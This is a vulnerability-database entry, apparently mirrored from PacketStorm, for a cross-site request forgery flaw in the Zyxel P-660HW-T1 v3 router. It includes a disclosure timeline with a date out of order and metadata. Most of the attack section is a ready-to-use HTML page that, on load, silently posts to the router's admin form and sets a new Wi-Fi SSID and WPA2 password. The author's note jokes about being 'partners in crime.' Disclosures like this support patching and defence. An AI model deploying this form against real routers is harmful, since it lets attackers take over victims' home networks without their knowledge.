Sign-up

ID

VAR-E-201405-0422


TITLE

Zyxel P-660HW-T1 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 126812

DESCRIPTION

Zyxel P-660HW-T1 version 3 suffers from a cross site request forgery vulnerability.

Trust: 0.5

sources: PACKETSTORM: 126812

AFFECTED PRODUCTS

vendor:zyxelmodel:p-660hw-t1scope: - version: -

Trust: 0.5

sources: PACKETSTORM: 126812

EXPLOIT

# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
# Category: Hardware/Wireless Router
# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------

Technical Details
---------------------------
This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
You can send the form below to prepare the target. Please offending. Being partners in crime.

Disclosure Timeline
---------------------------
05/21/2014 Contacted Vendor
05/22/2014 Vendor Replied
04/22/2014 Vulnerability Explained (No reply received)
05/26/2014 I was told that's not open vulnerabilities.
05/28/2014 Full Disclosure

Exploit Code
---------------------------

Change Wifi (WPA2/PSK) password & SSID by CSRF
---------------------------------------------------------------------------------
<html>
<body onload="document.form.submit();">
<form action="http://192.168.1.1/Forms/WLAN_General_1"
method="POST" name="form">
<input type="hidden" name="EnableWLAN" value="on">
<input type="hidden" name="Channel_ID" value="00000005">
<input type="hidden" name="ESSID" value="WIFI NAME">
<input type="hidden" name="Security_Sel" value="00000002">
<input type="hidden" name="SecurityFlag" value="0">
<input type="hidden" name="WLANCfgPSK" value="123456">
<input type="hidden" name="WLANCfgWPATimer" value="1800">
<input type="hidden" name="QoS_Sel" value="00000000">
<input type="hidden" name="sysSubmit" value="Uygula">
</form>
</body>
</html>

-----------

Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
www.altinkaynak.biz

Trust: 0.5

sources: PACKETSTORM: 126812

EXPLOIT HASH

LOCAL

SOURCE

md5: e11084a0c61bdd0f7b32abca92cf0844
sha-1: aec7a1bac23bac727ee877534893307f44fcbcde
sha-256: fd9b20b0d05fd77557aae1de1ada5ed4176bd0b607d5532fa11878fa9e8108c1
md5: e11084a0c61bdd0f7b32abca92cf0844

Trust: 0.5

sources: PACKETSTORM: 126812

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 126812

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 126812

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 126812

CREDITS

Mustafa ALTINKAYNAK

Trust: 0.5

sources: PACKETSTORM: 126812

EXTERNAL IDS

db:PACKETSTORMid:126812

Trust: 0.5

sources: PACKETSTORM: 126812

SOURCES

db:PACKETSTORMid:126812

LAST UPDATE DATE

2022-07-27T09:56:36.336000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:126812date:2014-05-27T16:18:01